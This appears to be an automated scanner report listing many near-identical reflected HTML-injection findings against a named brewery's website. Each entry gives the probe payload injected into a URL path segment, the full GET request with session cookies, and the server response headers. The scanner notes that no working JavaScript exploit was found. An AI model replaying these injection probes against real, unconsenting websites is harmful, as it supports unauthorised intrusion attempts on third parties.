<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0387"><a>286a56ca007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beersf0387"><a>286a56ca007/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:06 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dad3"><a>57b154d7fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers3dad3"><a>57b154d7fd1/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:09 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed707"><a>9aff3285dbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beersed707"><a>9aff3285dbf/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:09 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337e"><a>bf74ccda1f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers3337e"><a>bf74ccda1f5/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:07 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72af8"><a>8c4153079a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery72af8"><a>8c4153079a4/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:34 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef1f"><a>2fabca1655f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery6ef1f"><a>2fabca1655f/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:08 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf8b"><a>2b307023ca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewerycaf8b"><a>2b307023ca2/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:12 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c630"><a>4b43cdb9ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery2c630"><a>4b43cdb9ffe/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd1a"><a>7a2e695ff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery8bd1a"><a>7a2e695ff2/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:13 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78fa0"><a>dd60fcefdd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery78fa0"><a>dd60fcefdd7/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:14 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a328"><a>58cb21c931b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery1a328"><a>58cb21c931b/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:10 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebf4"><a>6ff175caf2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersbebf4"><a>6ff175caf2b/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:34 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload becda"><a>fd1c2df5815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersbecda"><a>fd1c2df5815/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:19 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd34a"><a>b8b6cd26d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersfd34a"><a>b8b6cd26d1a/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:20 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b5f"><a>54c1eee5e30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersb4b5f"><a>54c1eee5e30/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:18 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ea2"><a>efc19015908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersd9ea2"><a>efc19015908/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:24 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea81e"><a>7759b9fb197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersea81e"><a>7759b9fb197/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87c5"><a>07d9d56d600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careerse87c5"><a>07d9d56d600/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:53 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806cc"><a>6e5127e8258 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company806cc"><a>6e5127e8258/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:34 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ab6"><a>2f1540286bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /companyd1ab6"><a>2f1540286bf/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:02 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><a>c8816d8ff3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /companye706a"><a>c8816d8ff3f/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:58 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8fc"><a>5627c06183b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company5c8fc"><a>5627c06183b/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca1b"><a>883628057d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company7ca1b"><a>883628057d0/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:28 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
